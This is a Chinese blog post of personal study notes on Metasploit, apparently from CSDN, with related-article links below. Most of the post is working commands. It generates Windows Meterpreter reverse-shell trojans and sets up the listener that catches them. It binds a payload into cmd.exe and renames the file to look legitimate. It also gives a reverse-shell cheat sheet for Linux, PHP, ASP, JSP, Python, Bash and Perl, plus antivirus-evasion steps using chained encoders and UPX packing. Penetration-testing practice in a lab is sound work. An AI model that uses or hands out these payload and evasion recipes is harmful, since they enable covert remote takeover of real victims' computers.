MSF学习

已于 2023-12-13 20:42:38 修改
阅读量475 收藏 8
点赞数 5
分类专栏: WEB 文章标签: 学习
于 2023-12-13 13:26:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/134968989
版权

之前的渗透测试中 其实很少用到 cs msf

但是在实际内网的时候 可以发现 msf cs 都是很好用的 所以现在我来学习一下 msf的使用方法

kali自带msf

https://www.cnblogs.com/bmjoker/p/10051014.html

使用

msfconsole

启动即可

首先就是最正常的木马生成

所以这里其实只需要会木马生成

其他免杀什么的先不需要看

这里我们使用msfvenom

基本木马生成

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.53.128 LPORT=5555 -f exe > shell.exe

这里记得修改ip 和端口

然后上传

但是发现被杀了 我们先推出火绒 然后看看基本使用

这个时候我们需要打开msf

exploit/multi/handler 这个是来监听的

set payload windows/meterpreter/reverse_tcp  设置反向监听payload

set lhost 192.168.53.128                          # 我们的kali本机ip

set lport 5555                                    # 我们的kali本机端口

run

然后我们在windows上执行木马

获取到了控制权

捆绑程序木马生成

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.53.128 LPORT=5555 -x cmd.exe -f exe -o test_win10.exe


这里使用 -x 来捆绑一个可执行文件

当然需要将捆绑的引用放在目录下

然后我们修改一下名字

是不是就很像

然后我们开始上线        

木马生成其他

Linux:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

Python:

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash:

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl:

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

基本免杀

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.53.128  lport=5555 -e x86/shikata_ga_nai -i 20 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 10  -f exe -o shell.exe

这里使用 -e 参数

可以生成一个混淆的木马

然后我们再加壳

upx shell.exe

 无法绕过 因为这个只是一般的免杀 特征都被抓到了

这里我们开始使用自行编码

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b '\x00' lhost=192.168.53.128  lport=5555 -f c

-b 是删除指定的 字符串 然后 -f 是输出格式

双层小牛堡
关注
专栏目录
MSF学习—MS08-067
Vincent0sen的博客
09-02 1242
MS08-067
网安事件处理
qq_52973916的博客
03-18 1295
1.首先通过分析报警,流量分析,日志来收集所发生事故的信息,判断是什么病毒什么样的事故2.按优先级别给事故分级3.然后抑制攻击范围,阻止受害面扩大,封ip、联系厂商能否下线、关系统4.检查启动项 服务 进程 敏感文件 违规账号 结合everything 看新增加的文件新更改的文件5.放到设备里扫一下有没有后门 修补漏洞 打补丁 增加安全策略6.恢复业务系统7.溯源8.写报告①访问控制:确保只有授权用户可以访问您的系统、应用程序或数据。使用密码策略、访问权限配置、实现双因素认证等技术手段。②系统更新:及时对操
MSF学习笔记
B_l_a_nk的博客
04-05 2047
MSF工具学习
MSF的使用学习
2302_80097039的博客
09-19 997
更新安装包信息;只检查,不更新(已安装的软件包是否有可用的更新,给出汇总报告)# 更新已安装的软件包,不删除旧包;# 升级包,删除旧包二、使用方法使用方法:1. 基础使用:#进入框架# 使用search命令查找相关漏洞# 使用use进入模块#使用info查看模块信息#设置攻击载荷#查看模块需要配置的参数#设置参数#攻击后渗透阶段 #后渗透阶段。
msf学习之旅
12306小哥
11-11 961
从八月份到十一月份,从Antiy到新单位,现在算是正式落下脚。开始研究一些新的东西。上周正好有点时间,就在本地复现了三个msf系列的漏洞。做了相关记录,分享出来,网上也有相关文章,可以学习参考。 Microsoft Windows Server服务远程缓冲区溢出漏洞(MS06-040) #msfconsole msf &gt; search ms06-040 msf &gt; use ...
生命在于学习——MSF初体验(一)
易水哲的博客
10-20 3098
Metasploit初体验(一)
MSF学习笔记(11)
Shadow 爬爬记
02-12 958
本地提权漏洞检测 meterpreter &gt; run post/multi/recon/local_exploit_suggester 迁移到指定进程 migrate -N explorer.exe 自动脚本 msf exploit(multi/handler) &gt; set AutoRunScript migrate -n explorer.exe msf ...
msf 学习笔记(1)
Shadow 爬爬记
10-20 1355
msf数据库链接root@kali:~# msfdb reinit ##数据库重建 root@kali:~# msfdb init ##数据库链接 root@kali:~# service postgresql start ##启动pgsql数据库(5432接口未启动状态【netstat -pantu | grep 5432】) root@kali:~# msfdb start
MSF学习笔记(10)
Shadow 爬爬记
12-11 721
宏代码生成root@kali root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe 利用session 扩大战果 生成后门s
msf学习笔记(4)
Shadow 爬爬记
11-03 1115
MSF信息收集nmap扫描db_nmap -sV 192.168.1.1auxiliary扫描模块RHOSTS <>RHOST 192.168.1.1-24 192.168.1.1/24 files:/root/ip.txtarp扫描msf > use auxiliary/scanner/discovery/arp_sweep set INTERFACE ̵ RHOSTS̵ SHOST̵ S
ORB-SLAM2源码学习:ORBextractor.cc:IC_Angle 利用灰度质心法求解关键点方向角
2301_76831056的博客
11-01 702
IC_Angle 利用灰度质心法求解关键点方向角并在computeOrientation函数中被调用计算图像中所有特征点的方向。
嵌入式通信协议:MODBUS简明学习笔记
weixin_73867577的博客
11-02 353
学习Modbus的简明学习笔记
软件测试学习笔记丨Vue常用指令-条件渲染(v-if)
ceshiren_com的博客
11-05 498
v-show只是简单控制dom元素的display属性。v-if通过操纵dom元素来进行切换显示。
SPI通信详解-学习笔记
qq_45059758的博客
11-04 506
SPI通信
diffusion model 学习笔记
wubing's 博客
11-01 1002
郎之万公式: 描述了粒子做随机布朗运动 (粒子位置随时间变化的关系), 是一种 SDE, 描述了 由梯度力(即.即我们在无条件模型 DDPM 估计的噪声中添加一个微小的扰动(. 基本上,在采样一半时,基本上预测的。输出的是噪声的估计, 这个估计的噪声。通过上面的公式,我们可以知道,当知道。),就可以作为条件模型的噪声估计.首先,假设我们已经有了一个训练好的。: 每一步中保留的原始信号的比例。的计算有各种不同的方法,). 已经接近于真实的。)影响的系统的时间演化.也就是,我们训练的网络。
SAP ABAP开发学习——接口中间件(PI)
m0_64077397的博客
11-04 201
左侧的红圈表示没有被生成。
RL学习笔记-表格型方法
m0_63213284的博客
11-02 424
参考资料:蘑菇书;《世界冠军带你从零实践强化学习》B站课程。
从零学习大模型(十四)-----量化(一)
最新发布
red_guy的博客
11-05 496
量化(Quantization)是一种在计算机科学和深度学习中广泛应用的技术,其基本目标是通过减少模型中数值表示的位宽来降低计算和存储成本。简单来说,量化就是将高精度(通常是浮点数)转换为低精度(通常是定点数)表示,同时尽量保持模型的性能和准确性。量化通常用于深度学习模型(尤其是大模型)中,以减小模型的存储空间和提高推理速度。量化不仅可以减少模型的内存占用,还能提高硬件的计算效率,尤其是在低功耗设备(如移动端、嵌入式系统、边缘计算设备)上。范围选择:确定量化数据的最小值和最大值,从而决定数据的量化范围。
opencascade源码学习之HLRAlgo包 -HLRAlgo_BiPoint
汤圆
11-02 171
HLRAlgo_BiPoint类在OpenCASCADE的HLR算法中扮演重要角色,主要用于处理二维和三维数据中的边缘和面的关系。HLRAlgo_BiPoint类在OpenCASCADE中主要用于处理二维和三维数据,特别是在处理边缘和面的关系时非常有用。假设你有一个二维数据集,需要处理其中的边缘信息,你可以使用HLRAlgo_BiPoint类的方法来获取和处理这些数据。‌RgNLine()‌:处理多条线。‌OutLine()‌:处理外部线。‌IntLine()‌:处理内部线。‌Points()‌:获取点。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值